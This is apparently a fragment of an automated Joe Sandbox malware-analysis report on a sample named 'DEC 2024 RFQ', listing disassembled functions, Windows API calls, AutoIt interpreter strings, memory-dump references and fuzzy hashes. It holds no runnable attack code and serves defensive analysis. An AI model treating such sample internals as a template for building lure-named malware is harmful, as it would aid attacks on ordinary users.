                                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 000ABB0B
                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 000ABB36
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000ABB5E
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000ABB74
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3840717409-0
                                                                                                                      • Opcode ID: 3a40a8cc76b3f31c31182a20229bd6150f1210dc53e640620219c45cf5391876
                                                                                                                      • Instruction ID: 9c7675a175907db9df037bbfa25bfd21406499fb9cd9baa3bbf478988b829445
                                                                                                                      • Opcode Fuzzy Hash: 3a40a8cc76b3f31c31182a20229bd6150f1210dc53e640620219c45cf5391876
                                                                                                                      • Instruction Fuzzy Hash: 00412775600609EFEB219FA5DC88EBABBB8FB8A711F104168F905D7261D7749E01CB60
                                                                                                                      Function 0008D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 0008DA10
                                                                                                                      • _wcscat.LIBCMT ref: 0008DA28
                                                                                                                      • _wcscat.LIBCMT ref: 0008DA3A
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0008DA4F
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DA63
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0008DA7B
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0008DA95
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DAA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                      • Opcode ID: dacd8680b819f34c6d587ebc038fd48cb5a6e8b6cd67e629b2645e813b12950a
                                                                                                                      • Instruction ID: 61d8b382bf401115c0dbd78fa4f2909caa9894bcc69ccdfa60d30a5a31a8f78c
                                                                                                                      • Opcode Fuzzy Hash: dacd8680b819f34c6d587ebc038fd48cb5a6e8b6cd67e629b2645e813b12950a
                                                                                                                      • Instruction Fuzzy Hash: 898160715042419FCB64FF64C844AAEB7E8BF89710F188A2FF8C9C7291EA30D945CB52
                                                                                                                      Function 000AC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000AC1FC
                                                                                                                      • GetFocus.USER32 ref: 000AC20C
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 000AC217
                                                                                                                      • _memset.LIBCMT ref: 000AC342
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000AC36D
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 000AC38D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 000AC3A0
                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000AC3D4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000AC41C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000AC454
                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000AC489
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                      • Opcode ID: fad3f8829d032e3e3eb924be9e1341480117e61a65ce8b1b4b674916c0fabfa2
                                                                                                                      • Instruction ID: 8e7e6328093641aa42b7ef482f922c8e1ca2305eebff8630d485050960f92750
                                                                                                                      • Opcode Fuzzy Hash: fad3f8829d032e3e3eb924be9e1341480117e61a65ce8b1b4b674916c0fabfa2
                                                                                                                      • Instruction Fuzzy Hash: E181A0716083019FEB60CFA4C894EBBBBE4FB8A714F01492DF99597291C770D905CB92
                                                                                                                      Function 0009731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0009738F
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0009739B
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 000973A7
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 000973B4
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00097408
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00097444
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00097468
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 00097470
                                                                                                                      • DeleteObject.GDI32(?), ref: 00097479
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 00097480
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0009748B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: 4e94c7d991dd63dc996b48fb19e76031b27a738ac0860c55f9827d47e19d8fe6
                                                                                                                      • Instruction ID: 9f3142f67c57c5c58cb10c3720121f1a727843ca69baf2f825588b6de4c28a70
                                                                                                                      • Opcode Fuzzy Hash: 4e94c7d991dd63dc996b48fb19e76031b27a738ac0860c55f9827d47e19d8fe6
                                                                                                                      • Instruction Fuzzy Hash: DD515A76904709EFDB24CFA8CC84EAEBBB9EF49310F14852DF999A7211C735A940DB50
                                                                                                                      Function 00026A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00026B0C,?,00008000), ref: 00040973
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00026BAD
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00026CFA
                                                                                                                        • Part of subcall function 0002586D: _wcscpy.LIBCMT ref: 000258A5
                                                                                                                        • Part of subcall function 0004363D: _iswctype.LIBCMT ref: 00043645
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                      • Opcode ID: c53599e855f857ee2a5fe8b9ad36e150adf97394c4545f8996af1ad5774c9548
                                                                                                                      • Instruction ID: 8273caec1535bc7694d7cf0e92f21c2b9cc63797bf9c632fccb53c1b983b17ac
                                                                                                                      • Opcode Fuzzy Hash: c53599e855f857ee2a5fe8b9ad36e150adf97394c4545f8996af1ad5774c9548
                                                                                                                      • Instruction Fuzzy Hash: 2B02CD705083519FC724EF20D881AAFBBE5EF99354F10482DF8C9972A2DB31DA49CB52
                                                                                                                      Function 00082D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082D50
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00082DDD
                                                                                                                      • GetMenuItemCount.USER32(000E5890), ref: 00082E66
                                                                                                                      • DeleteMenu.USER32(000E5890,00000005,00000000,000000F5,?,?), ref: 00082EF6
                                                                                                                      • DeleteMenu.USER32(000E5890,00000004,00000000), ref: 00082EFE
                                                                                                                      • DeleteMenu.USER32(000E5890,00000006,00000000), ref: 00082F06
                                                                                                                      • DeleteMenu.USER32(000E5890,00000003,00000000), ref: 00082F0E
                                                                                                                      • GetMenuItemCount.USER32(000E5890), ref: 00082F16
                                                                                                                      • SetMenuItemInfoW.USER32(000E5890,00000004,00000000,00000030), ref: 00082F4C
                                                                                                                      • GetCursorPos.USER32(?), ref: 00082F56
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00082F5F
                                                                                                                      • TrackPopupMenuEx.USER32(000E5890,00000000,?,00000000,00000000,00000000), ref: 00082F72
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00082F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3993528054-0
                                                                                                                      • Opcode ID: faf18dcf991781b5aec77cb58981ae6b495f6460297409639b297dc9efaf574c
                                                                                                                      • Instruction ID: bd40936856ec3c4a590a496468f7e4f6fee813956ccf82de5f39068a44607a63
                                                                                                                      • Opcode Fuzzy Hash: faf18dcf991781b5aec77cb58981ae6b495f6460297409639b297dc9efaf574c
                                                                                                                      • Instruction Fuzzy Hash: 2A71F670600606BFFB21AF64DC85FAABFA8FF05724F100226F655AA1E1C7B55C20DB94
                                                                                                                      Function 000777DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      • _memset.LIBCMT ref: 0007786B
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000778A0
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000778BC
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000778D8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00077902
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0007792A
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00077935
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0007793A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                      • Opcode ID: 4d723e5c5efad53cb54329a74a54a7de3e0a996299a00370d9e5e73cec24ddf3
                                                                                                                      • Instruction ID: 2ad01e154d82f2e3bb9d6a5b9e09f372a49542edd3e1242be1d5ffced94f2dbf
                                                                                                                      • Opcode Fuzzy Hash: 4d723e5c5efad53cb54329a74a54a7de3e0a996299a00370d9e5e73cec24ddf3
                                                                                                                      • Instruction Fuzzy Hash: D5410872C1462DABDF11EFA4EC85DEDB7B8BF04350F40452AE909A7262EB345D04CB94
                                                                                                                      Function 000A0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                      • Opcode ID: 6bd07c8270c537ee71cf512ff3d84ae37bdf75af220f5f4ae7abec8467993d56
                                                                                                                      • Instruction ID: d3e35fe3efb64ca7857e7ae93900ecb7bb5069ce233bfd535aa586cdfdfa7d6c
                                                                                                                      • Opcode Fuzzy Hash: 6bd07c8270c537ee71cf512ff3d84ae37bdf75af220f5f4ae7abec8467993d56
                                                                                                                      • Instruction Fuzzy Hash: 2541587114034A8FCF20EF90E865AEE37A4AF12344F144465FC592B693DB35AD6ACBA1
                                                                                                                      Function 0007F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0005E2A0,00000010,?,Bad directive syntax error,000AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0007F7C2
                                                                                                                      • LoadStringW.USER32(00000000,?,0005E2A0,00000010), ref: 0007F7C9
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • _wprintf.LIBCMT ref: 0007F7FC
                                                                                                                      • __swprintf.LIBCMT ref: 0007F81E
                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0007F88D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                      • API String ID: 1506413516-4153970271
                                                                                                                      • Opcode ID: 752119fa80971e3498c1eeb6767d132db739d29783247ddaa88ec3b219c6fe16
                                                                                                                      • Instruction ID: 6e60a1b9a8610903e2f0a94147092c85ad9f643827ce95bfdc3a2fa34f5c2d16
                                                                                                                      • Opcode Fuzzy Hash: 752119fa80971e3498c1eeb6767d132db739d29783247ddaa88ec3b219c6fe16
                                                                                                                      • Instruction Fuzzy Hash: 1121A03284021EEBCF11EFA0DC0AEFE7738BF18300F04446AF509661A2EA71A618CB55
                                                                                                                      Function 000852C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                        • Part of subcall function 00027924: _memmove.LIBCMT ref: 000279AD
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00085330
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00085346
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00085357
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00085369
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0008537A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                      • Opcode ID: a2de81398a734370238c2b0fdaba9eed3e9fae2af5317d0a1b11b1e0e6705524
                                                                                                                      • Instruction ID: 5decb4dd0b2111c8cb421d94c8129546027aced379e8f89c7f53321551cf14e4
                                                                                                                      • Opcode Fuzzy Hash: a2de81398a734370238c2b0fdaba9eed3e9fae2af5317d0a1b11b1e0e6705524
                                                                                                                      • Instruction Fuzzy Hash: 7911B270A5422979D760B671DC4ADFF7BBCFB96B41F00042AB905A61D2EEA04D44C7B0
                                                                                                                      Function 000846B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                      • Opcode ID: 071aa0c54e1841b910e2fdf65b6f04a005c5ead8f98289e84954418223c208b9
                                                                                                                      • Instruction ID: de082ea80f6adccd2492279b864e6346f786044b461cae2e9dff71f4f7a75280
                                                                                                                      • Opcode Fuzzy Hash: 071aa0c54e1841b910e2fdf65b6f04a005c5ead8f98289e84954418223c208b9
                                                                                                                      • Instruction Fuzzy Hash: FB11E7719041166FDB60BB709C4AEEE7BBCEF02711F0401B6F58596092EF749A818754
                                                                                                                      Function 00084F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 00084F7A
                                                                                                                        • Part of subcall function 0004049F: timeGetTime.WINMM(?,75C0B400,00030E7B), ref: 000404A3
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00084FA6
                                                                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00084FCA
                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00084FEC
                                                                                                                      • SetActiveWindow.USER32 ref: 0008500B
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00085019
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00085038
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00085043
                                                                                                                      • IsWindow.USER32 ref: 0008504F
                                                                                                                      • EndDialog.USER32(00000000), ref: 00085060
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                      • Opcode ID: 6a37aa62e64db6a83d220dfb0171af7cf6f797284994db16c5aa43f9c0d50a55
                                                                                                                      • Instruction ID: 4cc1f306cd9dafce4b2093a285a1d4c3107e58dc42de93d98a485d411710c213
                                                                                                                      • Opcode Fuzzy Hash: 6a37aa62e64db6a83d220dfb0171af7cf6f797284994db16c5aa43f9c0d50a55
                                                                                                                      • Instruction Fuzzy Hash: 94218071605E46AFF7106F70ECC8B363BA9FB56B86F041038F246951B2DB6A4D108B61
                                                                                                                      Function 0008D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                      Download Yara Rule
